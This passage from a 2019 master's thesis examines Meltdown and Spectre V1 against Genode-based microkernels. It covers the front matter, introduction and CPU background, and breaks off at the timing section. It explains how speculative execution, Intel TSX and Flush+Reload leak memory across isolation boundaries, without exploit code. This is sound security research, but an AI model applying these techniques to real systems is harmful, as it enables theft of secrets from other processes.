examining the impact of micro- architectural attacks on

Linköpings universitetSE–581 83 Linköping+46 13 28 10 00 , www.liu.se

Linköping University | Department of Computer and Information ScienceMaster thesis, 30 ECTS | Datateknik

2019 | LIU-IDA/LITH-EX-A--19/045--SE

Examining the Impact of Micro-architectural Attacks on Micro-kernels– a study of Meltdown and Spectre

Gunnar GrimsdalPatrik Lundgren

Supervisor : Felipe BoeiraExaminer : Mikael Asplund

External supervisor : Christian Vestlund

http://www.liu.se

Upphovsrätt

Detta dokument hålls tillgängligt på Internet - eller dess framtida ersättare - under 25 år frånpubliceringsdatum under förutsättning att inga extraordinära omständigheter uppstår.Tillgång till dokumentet innebär tillstånd för var och en att läsa, ladda ner, skriva ut enstaka kopiorför enskilt bruk och att använda det oförändrat för ickekommersiell forskning och för undervisning.Överföring av upphovsrätten vid en senare tidpunkt kan inte upphäva detta tillstånd. All annananvändning av dokumentet kräver upphovsmannens medgivande. För att garantera äktheten,säkerheten och tillgängligheten finns lösningar av teknisk och administrativ art.Upphovsmannens ideella rätt innefattar rätt att bli nämnd som upphovsman i den omfattningsom god sed kräver vid användning av dokumentet på ovan beskrivna sätt samt skydd mot attdokumentet ändras eller presenteras i sådan form eller i sådant sammanhang som är kränkande förupphovsmannens litterära eller konstnärliga anseende eller egenart.För ytterligare information om Linköping University Electronic Press se förlagets hemsidahttp://www.ep.liu.se/.

Copyright

The publishers will keep this document online on the Internet - or its possible replacement - for aperiod of 25 years starting from the date of publication barring exceptional circumstances.The online availability of the document implies permanent permission for anyone to read, todownload, or to print out single copies for his/hers own use and to use it unchanged for non-commercial research and educational purpose. Subsequent transfers of copyright cannot revoke thispermission. All other uses of the document are conditional upon the consent of the copyright owner.The publisher has taken technical and administrative measures to assure authenticity, security andaccessibility.According to intellectual property law the author has the right to bementionedwhen his/her workis accessed as described above and to be protected against infringement.For additional information about the Linköping University Electronic Press and its proceduresfor publication and for assurance of document integrity, please refer to its www home page:http://www.ep.liu.se/.

©Gunnar GrimsdalPatrik Lundgren

http://www.ep.liu.se/

http://www.ep.liu.se/

Abstract

Most of today’s widely used operating systems are based on a monolithic design and havea very large code size which complicates verification of security-critical applications. Oneapproach to solving this problem is to use a microkernel, i.e., a small kernel which onlyimplements the bare necessities. A system using a microkernel can be constructed usingthe operating-system framework Genode, which provides security features and a strictprocess hierarchy. However, these systems may still be vulnerable to microarchitecturalattacks, which can bypass an operating system’s security features, exploiting vulnerablehardware.

This thesis aims to investigate whether microkernels are vulnerable to themicroarchitectural attacks Meltdown and Spectre version 1 in the context of Genode.Furthermore, the thesis analyzes the execution cost of mitigating Spectre version 1 in aGenode’s remote procedure call.

The result shows how Genode does not mitigate the Meltdown attack, which willbe confirmed by demonstrating a working Meltdown attack on Genode+Linux. We alsodetermine that microkernels are vulnerable to Spectre by demonstrating a working attackagainst two microkernels. However, we show that the cost of mitigating this Spectre attackis small, with a cost of 3% slowdown for remote procedure calls in Genode.

Acknowledgments

We would like to thank all the people at Sectra Communications AB for their welcomingand assistance with our thesis. We would like to give special thanks to our supervisorChristian Vestlund for his engagement and supporting knowledge on side-channel attacks.Additionally, we would like to thank Jonathan Jogenfors for his useful insights on writing athesis.

From Linköping University, we would like to thank our examiner Mikael Asplund for hisenthusiasm and academic input and Felipe Boeira for his feedback and support in writingour thesis.

iv

Contents

Abstract iii

Acknowledgments iv

Contents v

List of Figures viii

List of Tables x

1 Introduction 21.1 Microkernel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21.2 Genode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31.3 Meltdown and Spectre . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31.4 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41.5 Aim . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41.6 Research Questions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41.7 Delimitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51.8 Thesis Outline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

2 Background 62.1 CPU Optimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6

2.1.1 Cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62.1.2 Data Prefetching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72.1.3 Out-of-Order Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72.1.4 Speculative Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72.1.5 Intel TSX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

2.2 Timing Channels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72.2.1 Cache-Based Timing Channels . . . . . . . . . . . . . . . . . . . . . . . . 82.2.2 Accurately Measuring Time . . . . . . . . . . . . . . . . . . . . . . . . . . 8

2.3 Flush+Reload . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92.3.1 Shared Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92.3.2 Preventing Data Prefetching . . . . . . . . . . . . . . . . . . . . . . . . . . 10

2.4 Meltdown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102.4.1 Virtual Address Space . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102.4.2 Meltdown Attack Description . . . . . . . . . . . . . . . . . . . . . . . . . 112.4.3 Proof-Of-Concept Implementation . . . . . . . . . . . . . . . . . . . . . . 112.4.4 Mitigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122.4.5 Meltdown on Genode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12

2.5 Spectre . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122.5.1 Spectre V1 Attack Description . . . . . . . . . . . . . . . . . . . . . . . . 132.5.2 Spectre V1 Mitigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

2.5.2.1 Preventing Speculative Execution . . . . . . . . . . . . . . . . . 13

v

2.5.2.2 Index Bitmasking . . . . . . . . . . . . . . . . . . . . . . . . . . 142.6 Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15

2.6.1 Microkernel Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . 152.6.2 IPC Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15

2.7 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152.7.1 Genode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162.7.2 Side Channels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162.7.3 Microarchitectural Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . 162.7.4 Linux Control Groups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172.7.5 Security by Virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

3 Method 183.1 Setting up System Under Test . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18

3.1.1 Using x86 Intrinsics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183.1.2 Obtaining Output . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193.1.3 Building and Running on Nova . . . . . . . . . . . . . . . . . . . . . . . . 203.1.4 Building and Running on Okl4 . . . . . . . . . . . . . . . . . . . . . . . . 203.1.5 Building and Running on Linux . . . . . . . . . . . . . . . . . . . . . . . 213.1.6 Measuring Throughput . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21

3.2 Implementing the Flush+Reload Channel . . . . . . . . . . . . . . . . . . . . . . 223.2.1 Measuring Cache Hits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223.2.2 Preventing Data Prefetching . . . . . . . . . . . . . . . . . . . . . . . . . . 233.2.3 Adapting the Channel to Targeted Kernels . . . . . . . . . . . . . . . . . 243.2.4 Measuring Throughput of the Covert Channel . . . . . . . . . . . . . . . 253.2.5 Reducing Noise . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25

3.3 Implementing Meltdown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263.3.1 Recovering from Segmentation Fault . . . . . . . . . . . . . . . . . . . . . 263.3.2 Disabling Mitigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263.3.3 Choosing a Target Address . . . . . . . . . . . . . . . . . . . . . . . . . . 26

3.4 Implementing Spectre . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273.4.1 Ensuring Speculative Execution . . . . . . . . . . . . . . . . . . . . . . . 283.4.2 Configure Variables for Spectre . . . . . . . . . . . . . . . . . . . . . . . . 283.4.3 Measuring Throughput . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293.4.4 Measuring Impact of Mitigations . . . . . . . . . . . . . . . . . . . . . . . 29

4 Results 304.1 Flush+Reload . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30

4.1.1 Choosing Cache-Hit Thresholds . . . . . . . . . . . . . . . . . . . . . . . 304.1.2 Preventing Data Prefetching . . . . . . . . . . . . . . . . . . . . . . . . . . 314.1.3 Measuring Throughput . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334.1.4 Reducing Noise . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33

4.2 Meltdown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374.2.1 Reading a Victim’s Secret . . . . . . . . . . . . . . . . . . . . . . . . . . . 374.2.2 Reading the Linux Version Banner . . . . . . . . . . . . . . . . . . . . . . 37

4.3 Spectre . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374.3.1 Training the Branch Predictor . . . . . . . . . . . . . . . . . . . . . . . . . 374.3.2 Ensuring Speculative Execution . . . . . . . . . . . . . . . . . . . . . . . 394.3.3 Attack Throughput . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 394.3.4 Mitigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 394.3.5 Error Sources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41

5 Discussion 435.1 Flush+Reload . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

vi

5.1.1 Cache-Hit Measurements . . . . . . . . . . . . . . . . . . . . . . . . . . . 435.1.2 Choosing Cache-Hit Thresholds . . . . . . . . . . . . . . . . . . . . . . . 445.1.3 Preventing Data Prefetching . . . . . . . . . . . . . . . . . . . . . . . . . . 445.1.4 Inaccuracies in Throughput Measurements . . . . . . . . . . . . . . . . . 445.1.5 Reducing Noise . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45

5.2 Meltdown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455.2.1 Alternative Segmentation Fault Recovery . . . . . . . . . . . . . . . . . . 455.2.2 Turning off Mitigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455.2.3 The Difficulties of Reading Secrets . . . . . . . . . . . . . . . . . . . . . . 455.2.4 Reliability Issues with Meltdown . . . . . . . . . . . . . . . . . . . . . . . 46

5.3 Spectre . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465.3.1 Training the Branch Predictor . . . . . . . . . . . . . . . . . . . . . . . . . 465.3.2 Criticism of Heuristic Cache Flush . . . . . . . . . . . . . . . . . . . . . . 465.3.3 Throughput Anomalies . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465.3.4 Small Impact on Performance . . . . . . . . . . . . . . . . . . . . . . . . . 47

5.4 Source criticism . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475.5 The Work in a Wider Context . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48

5.5.1 Can OS Memory Separation be Trusted? . . . . . . . . . . . . . . . . . . . 485.5.2 Can Hardware Separation be Trusted? . . . . . . . . . . . . . . . . . . . . 485.5.3 Consequences for Security and Safety Critical Systems . . . . . . . . . . 485.5.4 Impact of This Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49

6 Conclusion 506.1 Future Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51

Bibliography 52

vii

List of Figures

2.1 A model of virtual memory composition. . . . . . . . . . . . . . . . . . . . . . . . . 11

3.1 Overview of Genode’s Hierarchy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193.2 The communication setup to retrieve output from the tested system. . . . . . . . . 193.3 A receiver observing access times for a cache hit on a Flush+Reload channel, built

on a contiguous padded array. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223.4 A model of memory access times for different memory levels. . . . . . . . . . . . . 233.5 A sequence diagram for measurements of the LLC access times. . . . . . . . . . . . 233.6 Leak Array Layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243.7 A sequence diagram of Flush+Reload communication between two processes. . . . 253.8 A sequence diagram of Meltdown using Intel TSX and Flush+Reload. . . . . . . . . 263.9 A sequence diagram of Spectre using Flush+Reload. . . . . . . . . . . . . . . . . . . 27

4.1 Time measurements for accessing L1 cached, LLC cached and uncached values onGenode+Okl4. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31

4.2 Time measurements for accessing L1 cached, LLC cached and uncached values onGenode+Nova. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31

4.3 Time measurements for accessing L1 cached, LLC cached and uncached values onGenode+Linux. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32

4.4 Time to access values in a pseudo-randomized or sequential pattern using 256bytes as internal padding on OKl4. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32

4.5 Time to access values in a pseudo-randomized or sequential pattern using 4096bytes as internal padding on Okl4. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33

4.6 Throughput from reading 2048 bytes from another process in Genode usingMeltdown on Genode+Linux. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37

4.7 Throughput out of for different choices of Ta and Na when reading a total of 2048bytes on Genode+Okl4. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38

4.8 Throughput of the Spectre attack for different choices of Ta and Na when readinga total of 2048 bytes on Genode+Nova. . . . . . . . . . . . . . . . . . . . . . . . . . . 38

4.9 Throughput of the Spectre attack for different choices of Ta and Na when readinga total of 2048 bytes on Genode+Linux. . . . . . . . . . . . . . . . . . . . . . . . . . 38

4.10 Throughput for Spectre V1 using different choices of Hs for heuristically flushingthe cache. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39

4.11 Measurements of execution time of RPC on Genode+Okl4 using Spectre V1mitigations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40

4.12 Measurements of execution time of RPC on Genode+Nova using Spectre V1mitigations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40

4.13 Measurements of execution time of RPC on Genode+Linux using Spectre V1mitigations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41

4.14 Percentage of correctly read bytes from reading 2048 bytes and compiling theapplication between each test. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42

viii

4.15 Percentage of correctly read bytes from reading 2048 bytes from running the samebinary multiple times on Linux. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42

ix

List of Tables

4.1 The Cache-hit thresholds in CPU cycles for each kernel. . . . . . . . . . . . . . . . . 314.2 Number of cache hits from iteration over uncached array using an SRG 256 times

on Genode+Okl4 for different internal padding sizes. . . . . . . . . . . . . . . . . . 314.3 Number of cache hits from iteration over uncached array using an SRG 256 times

on Genode+Nova for different internal padding sizes. . . . . . . . . . . . . . . . . . 324.4 Number of cache hits from iteration over uncached array using an SRG 256 times

on Genode+Linux for different internal padding sizes. . . . . . . . . . . . . . . . . . 324.5 Reading 2048 bytes with Flush+Reload within one process. . . . . . . . . . . . . . . 334.6 Reading 2048 bytes with Flush+Reload between two processes. . . . . . . . . . . . 344.7 Reading 2048 bytes using Flush+Reload within a process on Genode+Okl4 with

different number of attempts. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344.8 Reading 2048 bytes using Flush+Reload within a process on Genode+Nova with

different number of attempts. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344.9 Reading 2048 bytes using Flush+Reload within a process on Genode+Linux with

different number of attempts. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354.10 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Okl4

with different number of attempts. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354.11 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Nova

with different number of attempts. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354.12 Reading 2048 bytes between two processes, using Flush+Reload on

Genode+Linux with different number of attempts. . . . . . . . . . . . . . . . . . . . 364.13 Result of reading 2048 bytes with Spectre V1 with chosen parameters. . . . . . . . 394.14 Mean relative slowdown and standard deviation after applied lfence mitigation. 414.15 Mean relative slowdown and standard deviation after applied bitmask mitigation. 41

x

List of Tables

1

1 Introduction

Most of today’s widely used Operating Systems (OSs) like Windows, GNU/Linux andOSX1 are based on a monolithic design, meaning that all parts of the operating system actas a trusted part of the kernel. In such a design, drivers, file system and Inter-ProcessCommunication (IPC) are all handled as part of the kernel and trusted as such. Consequently,a flaw in any of these trusted components may compromise the entire kernel. Moreover, OSsbased on a monolithic design, like Windows and GNU/Linux, are difficult to verify dueto their size. The Linux kernel contains millions of lines of source code and is frequentlyupdated [6]. While there have been efforts to formally verify the correctness of softwareagainst a specification this has only been performed on a much smaller scale. The Sel4kernel, with its 9300 lines of code [23], has been formally verified against its specificationat the cost of roughly 20 to 1 verification code against source code and 22 person-years ofwork2. Microsoft researchers Hawblitzel et al. have in the Ironclad project [16], instead offocusing on application verification, used automated tools to verify security-critical libraries.The Ironclad project achieved a less costly verification at a 4.8 to 1 line of verification to sourcecode and 3 person-years of work. However, the fact remains that formal verification is verycostly, and that OSs containing millions of lines of code are with today’s tools far out of reachat a 5 times increase in development cost.

1.1 Microkernel

One approach to mitigate this size issue is to replace the monolithic kernel with a microkernel.A microkernel is a small kernel, typically containing only around 10,000 lines of code3. Thissmall size stems from one of the leading design goals of a microkernel, which is to run mostservices in user space and providing only essential functionality in kernel space. This typeof design reduces the amount of privileged code and may reduce the risk that kernel-levelservices are compromised. It also allows for the possibility of disabling unneeded services,which is important as it may reduce the attack surface of the kernel.

1Operating System Market Share Worldwide. en. May 2019. URL: http://gs.statcounter.com/os-market-share (visited on 2019-05-06).

2DATA61. The seL4 verification project. Jan. 2019. URL: http://ts.data61.csiro.au/projects/seL4-verification/ (visited on 2019-01-07).

3OSDev. Microkernel. 2019. URL: https://wiki.osdev.org/Microkernel (visited on 2019-01-03).

2

http://gs.statcounter.com/os-market-share

http://gs.statcounter.com/os-market-share

http://ts.data61.csiro.au/projects/seL4-verification/

http://ts.data61.csiro.au/projects/seL4-verification/

https://wiki.osdev.org/Microkernel

1.2. Genode

1.2 Genode

The small amount of code in microkernels may result in lack of some useful functionalitysuch as protocol stacks and network drivers. Genode is a framework for building secure OSsusing a microkernel and tries to address the issue of missing OS components [7]. Genodeprovides more than 100 ready-to-use components such as network drivers and protocolstacks. In Genode, as many components as possible are executed in user space. One keyfeature of Genode is that components are assigned a budget by its parent process for resourcessuch as CPU-time, memory and file system access. Genode has been developed to runon multiple kernels, for example, Nova, Okl4 and Linux. The Nova kernel, which is amicrohypervisor, is a research project aimed at secure virtualization. Similar to a microkernel,it provides essential functionality for virtualization like communication, scheduling andresource management4. Okl4 is an open-source microkernel based on the L4 microkernel.It can be used as a hypervisor or as a real-time OS and has been used practically by GeneralDynamics5.

Genode tries to achieve a secure OS design by carefully isolating components usinghardware and software separation [7]. Microarchitectural attacks have in some wayscompromised software and hardware separation. These attacks exploit the microarchitecturalstate of the CPU, e.g., caches or Translation Lookaside Buffer (TLB). Such attacks may breaksoftware which is dependent on a correct hardware implementation. This class of attacks hashad recent success in the form of Meltdown and Spectre [31, 24].

1.3 Meltdown and Spectre

Meltdown is a microarchitectural attack which exploits the fact that some modern CPUs mayexecute instructions out of order [31]. Specifically, Meltdown can read memory from anaddressable memory space which it should not be able to read from. Lipp et al. [31] useda Meltdown exploit to read memory from the kernel and other user processes in Linux. Thiswas possible as the Linux kernel’s memory was mapped into the address space of each userprocess. Genode’s founder Feske has stated that some in-kernel data structures in Genodeare likely vulnerable to the Meltdown attack6.

Spectre relies on the fact that some modern CPUs may speculatively execute instructions[24]. There are different versions of the Spectre attack [42, 24, 33], we will be looking at Spectreversion 1. Spectre version 1 exploits speculative execution to bypass boundary checks. Anattacker could use this attack to execute code which bypasses a boundary check and leaksinformation to the attacker.

Both Meltdown and Spectre rely on an attacker being able to transmit gathered data toand from the cache. Flush+Reload is a Side-Channel Attack (SCA) which abuses the timedifference of fetching uncached and cached data [48]. This channel can be used in the contextof Meltdown and Spectre to first read kernel memory into a cache exploiting their respectiveCPU optimizations. If the address which is cached is carefully crafted, the time with which aprocess can access this address can be measured to retrieve information.

SCAs extract information from another system or user by abusing some aspects of thesystem which are not supposed to transmit information. A side channel can also be used as acovert channel, i.e., a channel in which two colluding actors communicate via a side channel.

4NOVA Microhypervisor. URL: http://hypervisor.org/ (visited on 2019-03-19).5General Dynamics. Hypervisor Products - General Dynamics Mission Systems. en. 2018. URL: https : / /

gdmissionsystems.com/en/products/secure-mobile/hypervisor (visited on 2019-03-22).6N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/

mailman/message/36178974/ (visited on 2019-01-16).

3

http://hypervisor.org/

https://gdmissionsystems.com/en/products/secure-mobile/hypervisor

https://gdmissionsystems.com/en/products/secure-mobile/hypervisor

https://sourceforge.net/p/genode/mailman/message/36178974/


1.4. Motivation

1.4 Motivation

Software separation may work as mitigation against some microarchitectural attacks. Lippet al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed(KAISER) patch mitigates Meltdown [31]. KAISER removes the kernel map from user spaceand therefore removes Meltdown’s ability to access kernel memory7. However, the methodsused to mitigate Meltdown significantly impact performance [36].

There have been efforts to mitigate the Spectre attack. However, mitigations againstSpectre attacks are focused on treating the symptoms of the attack rather than preventing it.This is due to the fact that disabling speculative execution is usually not supported and thatany CPU performing speculative execution may leak data [33]. Thus, the options to addressthe problem are either to mitigate the attacks in software or the very expensive options ofreplacing speculating CPUs for non speculating ones.

The Genode OS framework is interesting from a security standpoint for its strict processseparation, its adherence to a minimal kernel and open-source code. However, it has beensuggested by Feske that some information can leak from Genode by the Meltdown attack8. Asuccessful attack may compromise security guarantees which is the very reason to reach forGenode. Furthermore, Feske states that there have been no efforts to mitigate Spectre attacks.

Schmidt et al. [39] demonstrated ways to circumvent security policies for Genode’s IPC.Schmidt et al. implemented a covert channel which abused a file system cache in Genode.The covert channel Schmidt et al. created could transfer data with a rate of 2 bit/s betweentwo user owned processes. To the best of our knowledge, there has been no previous workdemonstrating a violation of Genode’s memory separation.

1.5 Aim

This thesis aims to study the impact of microarchitectural attacks on microkernels. Inparticular, we aim to demonstrate the effectiveness of Meltdown and Spectre on microkernelsas well as to measure the performance impact after Spectre version 1 mitigations have beenapplied.

1.6 Research Questions

1. Can Flush+Reload be used to create a covert channel between two processes in Genode,measured as the throughput of demonstrated channel?

We answer this research question by demonstrating a working Flush+Reload channelbetween two processes in Genode. We define throughput as the number of successfullytransmitted bytes per second.

2. Are Remote Procedure Call (RPC) mechanisms in the microkernels Nova and Okl4vulnerable to the Spectre Version 1 (Spectre V1) attack, measured as throughput ofdemonstrated attack?

We answer this research question by demonstrating a Spectre attack exploiting a victimusing bounds-checked array access. The target implements a vulnerable RPC which isone of Genode’s mechanisms for IPC.

3. Can the Meltdown attack be executed on Genode?

We answer this research question by demonstrating that Meltdown can be used to readdata from another process.

7J. Corbet. KAISER: hiding the kernel from user space [LWN.net]. Nov. 2017. URL: https://lwn.net/Articles/738975/ (visited on 2019-01-22).

8N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/mailman/message/36178974/ (visited on 2019-01-16).

4

https://lwn.net/Articles/738975/




1.7. Delimitations

4. What is the performance impact of Spectre V1 Spectre mitigations alternatives,measured as relative slowdown of RPC mechanisms?

To answer this research question, we apply different mitigations and measure theirrespective performance impacts for each targeted kernel.

We reproduce Spectre on Genode+Okl4 and Genode+Nova with a throughput of � 2 kB/susing Flush+Reload. Furthermore, we demonstrate Meltdown on Genode+Linux by readingmemory from a victim process, transmitting up to � 9 kB/s. In addition, we show that theperformance impact of two different Spectre V1 mitigations on Genode’s RPCs is negligible.Consequently, we demonstrate that these microkernels are not secure by design and thatGenode does not provide protection against microarchitectural attacks.

1.7 Delimitations

The scope of this thesis is limited to attacking Genode on chosen hardware (Intel Core i5-7500CPU). There will not be any efforts to compare results on different types of hardware, nor willthere be efforts to evaluate kernels which are not supported by Genode.

1.8 Thesis Outline

This thesis begins by introducing the fundamentals of CPU optimizations as well as moredetailed information regarding the workings of microarchitectural attacks and performancemeasurements in Chapter 2. The method used to obtain results is presented in Chapter 3 andresults in Chapter 4. Work presented in a wider context and answers to research questionsare presented in Chapter 5 and Chapter 6 respectively.

5

2 Background

To understand the workings and implications of Meltdown and Spectre there is a need for afundamental understanding of CPU optimizations. Thus, this chapter begins by describingthe main optimizations which are utilized in the attacks. Furthermore, an understandingof timing channels is needed to understand the tools with which microarchitectural leakinformation. For this reason, this chapter continues by describing timing channels beforemoving on to the Meltdown and Spectre attacks.

2.1 CPU Optimizations

Modern CPUs use many kinds of optimizations to reduce execution time, some of whichneed be taken into account by a developer, others which seamlessly optimize executing code.Some of these optimizations may have noticeable effects on code execution, often relating toreduced execution time. For this reason, these optimizations are relevant to the use of timingchannels.

2.1.1 Cache

The time it takes to access data from DRAM is a bottleneck in modern computers, onememory access to DRAM can take � 240 CPU cycles on an Intel Pentium M processor[15]. Modern CPUs also contain faster memory called cache. The cache is often dividedinto different levels, where the levels closer to the CPU core are faster but smaller than thecache on higher levels [15]. The number of cache levels varies depending on which CPU isused. The cache closest to the core is called L1 cache, on the next level is the L2 cache andso on [15]. The highest level cache is called Last-Level Cache (LLC) and is often the L2 or L3cache in Intel CPUs, this cache is shared between multiple cores on multi-core CPUs [48]. TheCPU used in this thesis has three cache levels, L1, L2 and LLC; witch can be seen by runningthe command lscpu in the Linux terminal.

Memory accesses which resolve to a cache access are usually referred to as cache hits,whereas memory accesses which do not are referred to as cache misses.

6

2.2. Timing Channels

2.1.2 Data Prefetching

Data prefetching is an optimization which speculatively loads data into cache before it isexplicitly used. This is done to improve the performance of predictable access patterns, suchas sequential access [19].

2.1.3 Out-of-Order Execution

Modern CPUs have an optimization which allows the CPU to execute instructions out oforder [19]. Out-of-Order Execution (OOE) allows instructions to be executed simultaneouslyor before preceding instructions, this is done to minimize the time the CPU is stalled [19].Listing 2.1 shows an example in which OOE can reduce execution time. Line 1 fetchesmemory located at ptr, and line 2 cannot be executed while this fetching is in progress. TheCPU can, therefore, execute the instruction on line 3 while waiting for the data to be fetched.

Listing 2.1: Example of Out-of-Order Execution

1 mov edx, [ptr] ; Copy data from memory located at ptr to edx2 add edx, 1 ; Add 1 to edx3 mov ebx, 1 ; Copy 1 to ebx, may execute before line 2

2.1.4 Speculative Execution

Speculative execution is a technique for reducing the execution time of programs byspeculatively executing a branch which has yet to be determined valid [18]. If the branchis determined invalid, the result of the computations are reversed, returning the CPU to itsstate before the speculative execution [18]. However, speculative execution may alter themicroarchitectural state of the processor, including TLB and caches [18].

The Branch-Prediction Unit (BPU) makes different types of predictions for branches toenable faster execution. For conditional branches, the BPU a predicts either a false or trueoutcome depending on values stored in the Branch-Target Buffer (BTB) [19].

2.1.5 Intel TSX

Some Intel processors support the so-called Intel Transactional Synchronization Extension(TSX). This extension allows for transactional execution of code under some restrictions[20]. At its core, Intel TSX allows for executing some instructions as a transaction, eithercommitting the result of these instructions or aborting, subsequently reverting changes tothe CPU’s state from the computations. Similarly to speculative execution, Intel TSX doesnot revert microarchitectural state [20] and may thus leave information in the cache from anaborted transaction.

2.2 Timing Channels

Lampson wrote a paper defining covert channels in 1973, his definition was:

”Covert channels, i.e. those not intended for information transfer at all, such asthe service program’s effect on the system load.” [27, p. 4]

Hence, a covert channel is a communication channel which abuses a resource or a componentwhich is not intended for communication.

Side channels are unintended communication channels which depend on the physicalimplementation of a system rather than a theoretical weakness of it [11]. We distinguish sidechannels from covert channels in that a covert channel is between two or more cooperatingagents, while a side channel is one received by an attacker to spy on a victim.

7

2.2. Timing Channels

Timing channels are a subset of SCAs, where an attacker examines the time it takes for acertain task. Brumley and Boneh [2] executed a timing attack against a server running Apachewith OpenSSL. Brumley and Boneh could extract the RSA key from the server by executingmalformed SSL handshake multiple times, measuring the server’s response time to retrieveinformation from the computations.

2.2.1 Cache-Based Timing Channels

One category of these timing-channel attacks are cache-based channels; these attacks utilizethat access time for a memory address varies dependent on whether value is stored in thecache or not [8]. Cache-based channels include: Prime+Probe, Flush+Reload and Evict+Time[8, 48].

2.2.2 Accurately Measuring Time

